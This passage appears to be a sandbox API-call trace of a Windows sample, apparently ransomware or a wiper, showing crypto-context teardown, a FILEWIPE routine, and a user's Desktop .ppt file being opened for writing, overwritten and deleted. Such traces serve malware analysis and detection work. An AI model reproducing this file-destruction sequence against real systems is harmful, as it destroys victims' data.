HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.830] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0029.831] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.831] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.831] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.831] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.831] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.831] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.831] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.831] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.832] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.832] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.832] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.832] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.833] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.834] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.834] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.834] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0029.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.834] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.834] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0xad969250, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 0x7c2240 [0029.835] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.835] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.835] CharLowerBuffW (in: lpsz="byte[25926]", cchLength=0xb | out: lpsz="byte[25926]") returned 0xb [0029.835] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.835] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.835] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.835] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.835] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.835] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.836] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.836] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.836] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.836] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.836] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.836] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.837] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.837] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\auomeuf.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0029.837] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.837] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.838] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.838] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.838] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.838] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.838] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.838] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.838] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.838] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.838] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.838] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.838] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.839] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.839] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.839] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.839] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.839] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpFilePart=0x0) returned 0x31 [0029.839] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x11abe500, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 0x7c2240 [0029.839] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\auomeuf.ppt")) returned 1 [0029.840] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x11abe500, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 0 [0029.840] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0029.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.841] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.841] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.841] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.841] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.841] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.841] 